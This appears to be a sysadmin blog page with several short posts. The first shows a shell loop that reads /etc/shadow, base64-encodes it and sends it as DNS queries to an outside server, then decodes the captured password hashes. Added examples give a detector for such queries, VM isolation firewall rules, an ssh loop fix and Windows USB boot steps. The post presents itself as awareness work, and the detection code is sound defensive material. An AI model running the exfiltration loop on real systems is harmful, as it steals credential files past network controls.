Bitbull Tech Notes - home of free minds ...

Transport protected data out of highly secured zones by DNS requests

I often spend some time in highly isolated and secured networks.
Companies spend a lot of money to protect their sensitive data.

But so far I have often seen that the restrictions are not tight enough.

While layer-7 inspection of HTTPS traffic has become standard, DNS filtering has not.

Getting data out of secure zones by DNS requests is quite easy, so let's start with this example.

What you need to get it running:

  • A server within the secured zone to push some data out.
  • A server on the internet where you can read the DNS server logs.


So let's push the data out of the secure zone:

# -w63: wrap the base64 output at 63 characters, the maximum length of one DNS label
cat /etc/shadow | base64 -w63 | while read line
do
   host -tA $line.debug2.org 1.2.3.4
done

This command encodes the Linux password file and transfers it, one DNS query per line, to my DNS server listening at IP 1.2.3.4.

On the DNS server side, I can easily reconstruct the data from the query log:

[root@ns ~]# grep debug2.org /var/log/messages | tail -2
Oct 19 08:50:27 ns named[1017]: client 8.7.11.1#55075 (QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org): view default: query (cache) 'QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org/A/IN' denied
Oct 19 08:50:27 pan named[1017]: client 8.7.11.1#48274 (wOjA6OTk5OTk6Nzo6Ogo=.debug2.org): view default: query (cache) 'wOjA6OTk5OTk6Nzo6Ogo=.debug2.org/A/IN' denied

[root@pan ~]# grep debug2.org /var/log/messages | cut -d'(' -f2- | cut -d'.' -f1 | base64 -d
root:$6$QMXJFcGY$TkVB1fdrSBzM9nlhO...rsPIc3F.35TN2sloEuQofCFO4SSE9Z3/:17760:0:99999:7:::
[...]
_chrony:*:17760:0:99999:7:::


Sometimes the character case of the query name gets converted to upper or lower case on the way; in that case it is easy to do the same with base32 or uuencode.
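The same query log is what gives this channel away on the defender's side: the leftmost label is unusually long, consists only of base64/base32 alphabet characters, and one client issues many such queries against one zone. The following POSIX sh/awk filter is an added example, not part of the original post; it runs over constructed BIND log lines in the same format as the excerpt above (the two long labels are the post's own, the third line is a benign query added for contrast) and flags queries by label length and alphabet, then aggregates per client. The alphabet check ignores case, so labels that a resolver upper- or lower-cased are still caught.

```shell
#!/bin/sh
# Added example (not from the original post): spot DNS queries whose leftmost
# label looks like an encoded payload, as in the base64 labels above.

# Constructed sample in BIND's query-log format, as found in /var/log/messages.
sample_log() {
cat <<'EOF'
Oct 19 08:50:27 ns named[1017]: client 8.7.11.1#55075 (QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org): view default: query (cache) 'QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org/A/IN' denied
Oct 19 08:50:27 ns named[1017]: client 8.7.11.1#48274 (wOjA6OTk5OTk6Nzo6Ogo=.debug2.org): view default: query (cache) 'wOjA6OTk5OTk6Nzo6Ogo=.debug2.org/A/IN' denied
Oct 19 08:50:31 ns named[1017]: client 10.0.0.5#51234 (www.example.com): view default: query (cache) 'www.example.com/A/IN' denied
EOF
}

# flag_long_labels [MIN_LEN]
# Reads log lines on stdin and prints "client<TAB>first_label<TAB>qname" for
# every query whose leftmost label is at least MIN_LEN characters (default 20)
# and consists only of base64/base32 alphabet characters, any case.
flag_long_labels() {
  min=${1:-20}
  # Pull "client-ip queried-name" out of each line; drop lines without a query.
  sed -n 's/.*client \([0-9.]*\)#[0-9]* (\([^)]*\)).*/\1 \2/p' |
  awk -v min="$min" '{
      split($2, lab, ".")
      first = lab[1]
      if (length(first) >= min && first ~ "^[A-Za-z0-9+/=]+$")
          print $1 "\t" first "\t" $2
  }'
}

# flagged_per_client [MIN_LEN]
# Same input; prints "client count label_bytes" so one source sending many
# encoded labels stands out even when each individual label is short.
flagged_per_client() {
  flag_long_labels "$@" |
  awk -F'\t' '{ cnt[$1]++; bytes[$1] += length($2) }
              END { for (c in cnt) print c, cnt[c], bytes[c] }'
}

# Demonstration on the constructed sample: two hits, both from 8.7.11.1.
sample_log | flag_long_labels
sample_log | flagged_per_client
```

Feed it with `grep named /var/log/messages | flag_long_labels 40` to cut down false positives from long but legitimate CDN labels; the per-client count and the total label bytes are the better signal when a short label length is used, as the `-w63` wrapping above can be lowered at will.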

This is not meant to be used against the law, but should help to raise awareness of security ... and its problems.

Thanks

Quick and dirty: isolate 10 VMs on a KVM host from accessing the network

PROD NET: 192.168.1.0/24

VM IP RANGE TO ISOLATE: 192.168.1.221-230

service iptables restart
# last rule, reject all (inserted first with -I, so it ends up at the bottom of the chain)
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst 192.168.0.0/16 -j REJECT

# accept from test net to dns/dhcp
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst 192.168.1.50/32 -j ACCEPT

# accept from test net to test net
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst-range 192.168.1.221-192.168.1.230 -j ACCEPT

# accept from NOT test net to test net
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange \! --src-range 192.168.1.221-192.168.1.230 --dst-range 192.168.1.221-192.168.1.230 -j ACCEPT

# enable conntracking
iptables -I FORWARD -m physdev --physdev-is-bridged -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

echo "--- ISOLATED CLASSROOM FROM PROD NETWORK ... DONE"
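Because `-I` prepends, the script above has to list the rules in reverse evaluation order, which is easy to get wrong when a rule is added later. The following script is an added example, not the post's own code: it builds the same five rules with `-A` into a dedicated chain, so they read top to bottom in the order the kernel evaluates them (first match wins), and hooks that chain into FORWARD once for bridged traffic, which is equivalent to the per-rule `--physdev-is-bridged` above. The addresses are the post's values; the command name is a parameter so `build_isolation_chain echo` prints the plan without touching the firewall. As in the post, only destinations in 192.168.0.0/16 are rejected; widen PROD_NETS if the VMs must not reach anything else.

```shell
#!/bin/sh
# Added example (not from the original post): the post's VM isolation as a
# readable, idempotent chain. Values below are the post's; adjust as needed.
TEST_RANGE=${TEST_RANGE:-192.168.1.221-192.168.1.230}
DNS_DHCP=${DNS_DHCP:-192.168.1.50/32}
PROD_NETS=${PROD_NETS:-192.168.0.0/16}
CHAIN=VM_ISOLATE

# build_isolation_chain [COMMAND]
# COMMAND defaults to iptables; pass "echo" for a dry run.
build_isolation_chain() {
  ipt=${1:-iptables}

  # Create the chain, or flush it if it already exists (idempotent re-runs).
  $ipt -N "$CHAIN" 2>/dev/null || $ipt -F "$CHAIN"

  # 1. Return traffic of connections that were already allowed.
  $ipt -A "$CHAIN" -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
  # 2. Anything NOT from the test range may reach the test range.
  $ipt -A "$CHAIN" -m iprange ! --src-range "$TEST_RANGE" \
       --dst-range "$TEST_RANGE" -j ACCEPT
  # 3. Test VMs may talk to each other.
  $ipt -A "$CHAIN" -m iprange --src-range "$TEST_RANGE" \
       --dst-range "$TEST_RANGE" -j ACCEPT
  # 4. Test VMs may reach the DNS/DHCP server.
  $ipt -A "$CHAIN" -m iprange --src-range "$TEST_RANGE" \
       --dst "$DNS_DHCP" -j ACCEPT
  # 5. Everything else from the test range into the prod nets is rejected.
  $ipt -A "$CHAIN" -m iprange --src-range "$TEST_RANGE" \
       --dst "$PROD_NETS" -j REJECT

  # Hook the chain into FORWARD for bridged traffic, only if not already there.
  $ipt -C FORWARD -m physdev --physdev-is-bridged -j "$CHAIN" 2>/dev/null ||
  $ipt -I FORWARD -m physdev --physdev-is-bridged -j "$CHAIN"
}

# Dry run: print the rule set in evaluation order.
# Run `build_isolation_chain iptables` as root on the KVM host to apply it.
build_isolation_chain echo
```

After applying, `iptables -S VM_ISOLATE` shows the rules in exactly the order printed by the dry run, which makes the review of "what is allowed before the REJECT" a straight read instead of a mental reversal.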


Add CA Cert to vRealize Automation CertStore

Problem was:

I generated a self-signed CA chain with a wildcard certificate.

After a successful import, the vRA health check started whining about the unknown CA cert:

sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target

Then I added the CA cert to the Java certstore and rebooted ... now it is green again:

vra1:~ # keytool -import -trustcacerts -file /root/ca.crt -alias vra.lab.local -keystore /usr/java/jre-vmware/lib/security/cacerts
Enter keystore password:
Certificate already exists in keystore under alias <load-balancer>
Do you still want to add it? [no]:  yes
Certificate was added to keystore
vra1:~ # keytool -import -trustcacerts -file /root/ca.crt -alias web.lab.local -keystore /usr/java/jre-vmware/lib/security/cacerts
Enter keystore password:
Certificate already exists in keystore under alias <load-balancer>
Do you still want to add it? [no]:  yes
Certificate was added to keystore

Why SSH breaks bash loops and how to get around it

[root@kvm2 bin]# seq 3 | while read i; do echo $i; done
1
2
3
[root@kvm2 bin]# seq 3 | while read i; do echo $i ; ssh kvm1 date ; done
1
Wed Sep 13 15:55:46 CEST 2017
[root@kvm2 bin]# for i in $(seq 3) ; do echo $i ; ssh kvm1 date ; done
1
Wed Sep 13 15:55:54 CEST 2017
2
Wed Sep 13 15:55:54 CEST 2017
3
Wed Sep 13 15:55:54 CEST 2017
[root@kvm2 bin]# for i in $(seq 3) ; do echo $i ; ssh -n kvm1 date ; done
1
Wed Sep 13 15:56:03 CEST 2017
2
Wed Sep 13 15:56:04 CEST 2017
3
Wed Sep 13 15:56:04 CEST 2017
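What the transcript shows: ssh reads its standard input and forwards it to the remote command, so inside `seq 3 | while read i` the first ssh drains lines 2 and 3 from the pipe and the loop ends after one round. The `for i in $(seq 3)` form survives because its list is expanded before the loop starts (ssh then reads the terminal instead), and `ssh -n` fixes the `while` form by redirecting ssh's stdin from /dev/null. The script below is an added example, not from the post; `fake_ssh` stands in for `ssh kvm1 date` by swallowing stdin the way ssh does and printing one line, so the number of output lines equals the number of iterations that actually ran. It also shows a third way, reading the loop through a separate file descriptor, for cases where the remote command must keep its stdin.

```shell
#!/bin/sh
# Added example (not from the original post): why `ssh` inside
# `... | while read` ends the loop early, and two ways around it.

# Stand-in for `ssh kvm1 date`: consumes all of stdin, then prints one line.
fake_ssh() {
  cat >/dev/null
  echo "remote date"
}

# The post's first form: fake_ssh eats lines 2 and 3, so only one round runs.
iterations_bare() {
  seq 3 | while read -r i; do fake_ssh; done | wc -l | tr -d ' '
}

# The post's fix, `ssh -n`: same as giving ssh /dev/null as stdin.
iterations_detached() {
  seq 3 | while read -r i; do fake_ssh </dev/null; done | wc -l | tr -d ' '
}

# Alternative when the remote command needs its stdin: feed the loop on
# fd 3, so the body's stdin is never the pipe. Call it with stdin redirected
# (`iterations_fd3 </dev/null`), otherwise fake_ssh waits on the terminal.
iterations_fd3() {
  while read -r i <&3; do fake_ssh; done 3<<EOF | wc -l | tr -d ' '
1
2
3
EOF
}

echo "bare loop:   $(iterations_bare) iteration(s)"               # 1
echo "ssh -n:      $(iterations_detached) iteration(s)"           # 3
echo "fd 3:        $(iterations_fd3 </dev/null) iteration(s)"     # 3
```

The same stdin drain happens with any command that reads its input (`ffmpeg`, `mysql`, `cat`), which is why `read -r line <&3 ... 3< file` is the habit worth forming for loops that call out to other programs.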

Create Windows 7 USB boot media

Not as easy as with Linux, but also not that hard.

fdisk /dev/sdh    # create partition as shown below

fdisk -l /dev/sdh
   Device Boot      Start         End      Blocks   Id  System
    /dev/sdh1            2048     7864319     3931136    7  HPFS/NTFS/exFAT

mkfs.ntfs -f /dev/sdh1

dd if=/usr/lib/syslinux/bios/mbr.bin of=/dev/sdh   # write the MBR boot code; use mbr.bin from the syslinux package

mkdir /tmp/iso /tmp/usb

mount SW_DVD5_Win_Pro_7_64BIT.ISO /tmp/iso/
mount /dev/sdh1 /tmp/usb/

cp -rv /tmp/iso/* /tmp/usb/

umount /tmp/iso
umount /tmp/usb